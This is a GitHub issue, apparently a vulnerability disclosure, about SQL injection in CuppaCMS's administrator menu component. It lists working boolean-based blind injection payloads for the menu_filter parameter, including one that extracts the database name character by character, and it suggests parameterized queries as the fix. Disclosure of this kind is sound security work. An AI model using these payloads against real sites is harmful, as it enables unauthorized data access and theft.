Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/ #14

Open
truonghuuphuc opened this issue Jan 4, 2022 · 0 comments

Comments

@truonghuuphuc
Copy link

truonghuuphuc commented Jan 4, 2022

  • VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
    “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters.
  • Date: 4/1/2022
  • Exploit Author: Trương Hữu Phúc
  • Contact me:
  • Github: https://github.com/truonghuuphuc
  • Email: phuctruong2k@gmail.com
  • Product: CuppaCMS
  • Description: The vulnerability is present in the “/administrator/components/menu/" , and can be
    exploited throuth a POST request via the ‘path=component/menu/&menu_filter=3’ parameters.
  • Impact: Allow attacker inject query and access , disclosure of all data on the system.
  • Suggestions: User input should be filter, Escaping and Parameterized Queries.
  • Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
  • Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
  • Payload exploit example: path=component/menu/&menu_filter=3' and
    if(SUBSTRING(database(),index,1)='character','1','0')='1
  • Payload exploit: path=component/menu/&menu_filter=3' and
    if(SUBSTRING(database(),1,1)='c','1','0')='1
  • Proof of concept (POC):
  • Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
  • Request and Response:
    true
  • Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
  • Request and Response:
    false
  • Exploit:
    poc
    database
  • Report:
    Report.pdf
@truonghuuphuc truonghuuphuc changed the title SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters. SQL injection vulnerability exists in CuppaCMS part 2 Jan 10, 2022
@truonghuuphuc truonghuuphuc changed the title SQL injection vulnerability exists in CuppaCMS part 2 SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/ Jan 13, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant